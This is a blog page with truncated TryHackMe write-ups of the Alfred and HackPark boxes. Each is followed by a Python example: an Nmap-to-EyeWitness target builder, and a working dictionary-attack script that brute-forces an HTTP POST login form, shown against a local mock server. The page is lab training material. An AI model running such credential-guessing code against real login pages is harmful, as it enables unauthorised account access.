Posts

Showing posts from October, 2023

Hacking Alfred (thm)

The Alfred box from THM teaches us more about attacking Jenkins and abusing the SeImpersonatePrivilege to perform privilege escalation on a Windows system... A quick Nmap scan showed that three common TCP ports were open; port 8080 seemed the most likely one to be serving Jenkins. It would be easy at this point to navigate to the web pages, but I wanted to try EyeWitness on them first. This may seem pointless (and it is!) for a room like this one, but EyeWitness is useful when web app testing, especially if there are lots of domains to check: it gives us a good high-level overview of what we are up against. The first step with EyeWitness is to create a file containing the domains to be targeted; I created a .txt file for this. EyeWitness produces an HTML report which can be opened in a browser. In this example, the results have been saved into a directory using the -d flag, and we can see the results there, too. The scan unsurprisingly revealed that Jenkins was running on port 8...
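The target file that EyeWitness reads is the one manual step in the workflow above. The script below, an added example rather than anything from the write-up, builds it straight from the Nmap scan: it parses grepable (-oG) output, keeps the open TCP ports that look like web services, and writes one URL per line for `eyewitness -f targets.txt -d <dir> --web`. The scan line it parses is constructed for the demo (the real Alfred scan is not reproduced on this page), and the `alfred.gnmap` filename, the web-port list and the scheme heuristic are assumptions.

```python
"""Build an EyeWitness target file from nmap grepable (-oG) output.

Added example for this write-up, not the box author's own script. It assumes
the scan was saved with `nmap -sV -oG alfred.gnmap <target>` and that EyeWitness
is then pointed at the generated file with `eyewitness -f targets.txt -d out --web`.
"""
import re

# Constructed sample of nmap -oG output; not the real scan from the room.
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated ... as: nmap -sV -oG alfred.gnmap 10.10.10.10
Host: 10.10.10.10 ()\tStatus: Up
Host: 10.10.10.10 ()\tPorts: 80/open/tcp//http//Microsoft IIS httpd 10.0/, 3389/open/tcp//ms-wbt-server///, 8080/open/tcp//http//Jetty 9.4.z-SNAPSHOT/\tIgnored State: filtered (997)
# Nmap done at ... -- 1 IP address (1 host up) scanned in 30.00 seconds
"""

# Service labels nmap assigns that are worth screenshotting (assumed list).
WEB_SERVICES = {"http", "https", "http-proxy", "http-alt", "ssl/http", "https-alt"}
# Ports to treat as web even when nmap's service guess is empty (assumed list).
WEB_PORTS = {80, 443, 8000, 8080, 8443}

# Each -oG port entry is port/state/protocol/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)//([^/]*)//")


def parse_gnmap(text):
    """Yield (host, port, service) for every open TCP port in -oG output."""
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        # The Ports field ends at the tab before "Ignored State:" (if present).
        ports_field = line.split("Ports:", 1)[1].split("\t")[0]
        for m in PORT_RE.finditer(ports_field):
            port, state, proto, service = m.groups()
            if state == "open" and proto == "tcp":
                yield host, int(port), service


def web_targets(text):
    """Return the URLs EyeWitness should visit, one per open web service."""
    urls = []
    for host, port, service in parse_gnmap(text):
        if service in WEB_SERVICES or port in WEB_PORTS:
            tls = "https" in service or "ssl" in service or port in (443, 8443)
            urls.append(f"{'https' if tls else 'http'}://{host}:{port}")
    return urls


def write_targets(text, path):
    """Write the URL list to `path`, the file later passed to eyewitness -f."""
    urls = web_targets(text)
    with open(path, "w") as fh:
        fh.write("\n".join(urls) + "\n")
    return urls


if __name__ == "__main__":
    for url in write_targets(SAMPLE_GNMAP, "targets.txt"):
        print(url)
    # next step: eyewitness -f targets.txt -d eyewitness_out --web
```

RDP on 3389 is deliberately dropped: EyeWitness only renders HTTP(S), so feeding it non-web ports just produces empty entries in the report.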

Hacking Hack Park (thm)

This box on THM does not need to be scanned with Nmap, as the path to exploitation is via the web app running on the default HTTP port 80. We do not need to do any directory busting, either, as the link to the login page is easily found on the home page. The first question asks us about the name of the creepy clown picture; we could do a reverse image search using Google, but I think most people know who it is. Once I got to the login page, I intercepted the POST request containing the test username and password with Burp Suite. This enabled me to find the body of the POST request along with the path to the login.aspx resource, both of which are needed to perform a dictionary attack using Hydra (Hydra's http-post-form module also needs a string that appears only on a failed login, so it can tell a hit from a miss). Dictionary attacks are a form of brute-force attack in which we use specially crafted wordlists of possible usernames and/or passwords instead of brute-forcing every possible combination of characters. I performed a dictionary attack against a username based off the clown picture to...
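To make concrete what Hydra does with the three pieces gathered above (the path, the POST body and a failure string), here is an added example, not the write-up's own commands, that replays the captured body for each candidate password and treats a response without the failure string as a hit. It runs against a constructed local mock of a login.aspx page on an OS-chosen port; the `/Account/login.aspx` path, the field names in the body, the "Login failed" string, the wordlist and the demo credential are all assumptions for the demonstration and are not the room's answers.

```python
"""Dictionary attack against an HTTP POST login form (what hydra http-post-form does).

Added example for this write-up, not the box author's commands. The target is
a constructed local mock; field names, path, failure string and wordlist are
assumed for the demo.
"""
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# --- constructed mock target standing in for the login.aspx page ---
MOCK_USER = "admin"
MOCK_PASS = "1qaz2wsx"            # assumed demo credential, not the room's answer
FAILURE_STRING = "Login failed"   # what hydra's F= condition would match on
LOGIN_PATH = "/Account/login.aspx"  # assumed path; the page only says login.aspx


class MockLogin(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("UserName", [""])[0]
        pwd = form.get("Password", [""])[0]
        ok = self.path == LOGIN_PATH and user == MOCK_USER and pwd == MOCK_PASS
        body = b"<p>Welcome back</p>" if ok else b"<p>Login failed</p>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_mock():
    """Serve the mock on 127.0.0.1 with a port chosen by the OS."""
    srv = HTTPServer(("127.0.0.1", 0), MockLogin)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


# --- the attack: same inputs hydra needs (path, body template, failure string) ---
def try_login(base_url, path, body_template, username, password, failure_string):
    """POST one candidate; True when the response lacks the failure string."""
    body = (body_template.replace("^USER^", urllib.parse.quote(username))
                         .replace("^PASS^", urllib.parse.quote(password)))
    req = urllib.request.Request(
        base_url + path, data=body.encode(),
        headers={"Content-Type": "application/x-www-form-urlencoded"})
    with urllib.request.urlopen(req, timeout=5) as resp:
        return failure_string not in resp.read().decode(errors="replace")


def dictionary_attack(base_url, path, body_template, username, wordlist, failure_string):
    """Return the first password in `wordlist` that logs in as `username`, else None."""
    for candidate in wordlist:
        if try_login(base_url, path, body_template, username, candidate, failure_string):
            return candidate
    return None


# Body as it would be copied from the intercepted POST, with hydra-style placeholders.
BODY_TEMPLATE = ("__VIEWSTATE=abc&UserName=^USER^&Password=^PASS^"
                 "&ctl00%24Login1%24LoginButton=Log+in")
WORDLIST = ["password", "123456", "letmein", "1qaz2wsx", "qwerty"]  # constructed


def demo(username="admin"):
    """Run the attack against the local mock and return the recovered password."""
    srv = start_mock()
    base = f"http://127.0.0.1:{srv.server_address[1]}"
    try:
        return dictionary_attack(base, LOGIN_PATH, BODY_TEMPLATE, username,
                                 WORDLIST, FAILURE_STRING)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print("found:", demo())
```

The failure-string check is the part people get wrong with Hydra: if the string also appears on a successful login (or the site answers with a redirect instead of a page), every guess looks like a miss, so confirm the string against one known-bad attempt in Burp before running the wordlist.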